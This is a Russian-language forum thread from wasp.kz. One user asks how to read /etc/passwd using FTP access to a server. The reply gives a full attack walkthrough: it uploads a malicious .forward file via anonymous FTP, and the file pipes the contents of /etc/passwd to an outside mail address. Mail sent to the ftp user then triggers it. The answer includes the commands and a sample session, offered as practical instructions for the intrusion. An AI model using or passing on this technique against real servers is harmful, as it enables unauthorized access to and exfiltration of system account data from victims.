О нет! Где
JavaScript ?
У Вашего браузера отключен JavaScript или он просто не поддерживает JavaScript. Пожалуйста
включите JavaScript на Вашем веб-браузере для нормального просмотра данного веб-сайта,
или
обновите свой браузер на поддерживаемый JavaScript;
Firefox ,
Safari ,
Opera ,
Chrome или
Internet Explorer не ниже, чем версия 6.
Как прочитать /etc/passwd?
Nevillberger
Опубликовано 19-06-2024 11:15
Новичок
Сообщений: 4
Зарегистрирован: 19/06/2024 07:16
Как бы мне, имея FТР-доступ к серверу, прочитать /etc/passwd?
Тебе для этого необходимо выполнить следующий ftp-сценарий со своего сервера
Код bash# cat myforward_file
"cat /etc/passwd | /bin/mail hacker© mail.ru "
bash# ftp victim.com
Connected to victim.com
220 victim FTP server ready Name (victim.com:hacker):ftp 331 Guest login ok, send you e-mail as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> ls -l
220 PORT command succesful.
150 Opening ASCII mode data connection for '/bin/
Is'. (192.168.1.1, 2335) (0 bytes) total 4
dr-xr-xr-x 2 root operator 512 Feb 28 2000 bin
dr-xr-xr-x 2 root operator 512 Sep 18 2000 etc
drwxrwxrwt 13 root operator 1024 Jul 1 00:55 incoming
drwxr-xr-x 3 root operator 512 Feb 19 10:25 pub
226 Transfer complete.
ftp>put myforward_file .forward
ftp>quit
bash# echo 'You a hacked' | mail ftp© victim.com
В итоге, когда почту отошлют юзеру ftр, выполнится .forward-файл. Если у демона будет достаточно прав для чтения/etc/passwd, то его содержимое придет к тебе на мыло
*
Изменил(а) wasp , 19-06-2024 12:11
Kolmar-X
Опубликовано 15-07-2024 17:58
Пользователь
Сообщений: 60
Зарегистрирован: 06/01/2023 11:36
Вот так вот весь вред в мире!
Перейти на форум:
Правила сайта и форума wasp.kz
Новости. События. Даты.
О сайте и форуме
Процессоры - CPU
Материнские платы - Mainboard
Видеокарты - Videocards
Оперативная память - RAM
Накопители - HDD, CD/DVD, Flash...
Системы охлаждения - coolers
Блоки питания, UPS, фильтры...
Корпуса - Case
ТВ-тюнеры - TV-Tuner's
Контроллеры, адаптеры, порты, разъемы
Сборка ПК, проблемы, вопросы
Ноутбуки, нетбуки и подобное
Телефоны, смартфоны, планшеты...
Разное, аксессуары
ОС Windows
OC Linux и FreeBSD, Android, iOS и прочее
Программы - всякие
Безопасность
Разное прочее
Связь и интернет-доступ, провайдеры
Модемы, сети, LAN, Wi-Fi и прочее оборудование
Создание сайтов
Интернет - общее
Сервисы Яндекса и Гугла, ФБ и VK, прочие соцсети
Бизнес в интернете
Майнинг и криптовалюты
Принтеры, МФУ, сканеры, факсы...
Заправка картриджей принтеров, копиров...
Клавиатуры, мыши, манипуляторы
Видео, веб-камеры, фотоаппараты, наблюдение
Мониторы
Action/RPG - Стрелялки
Гонки, Симуляторы, Стратегии...
Adventure и Survival Horror
Общее не вошедшее
Зона S.T.A.L.K.E.R-ов !!!
Вселенная Fallout...
Crysis и серия Far Cry
ZOMBIELAND - игры про зомби
Отзывы об магазинах, компаниях, продавцах, сервисе
Отзывы на товары и услуги - все
Товары и услуги - не спам!
Кулинария и застолье
Аппаратура, колонки, усилители, магнитофоны...
Звуковые карты - audiocards, ЦАП
Спутниковое, эфирное и кабельное телевидение
Электроника, радиодело, ремонт
Интересное. Полезное. Нужное.
Казахстан - все разговоры
Музыка и Кино, Театр, Искусство
Коронавирус COVID-19
История, география... науки!
Альтернативная энергетика
Работа, предложения, вакансии
Политический уголок - вся возня!
Зооуголок
Вы не зарегистрированы?
Нажмите здесь для регистрации.
Забыли пароль?
Запросите новый
здесь .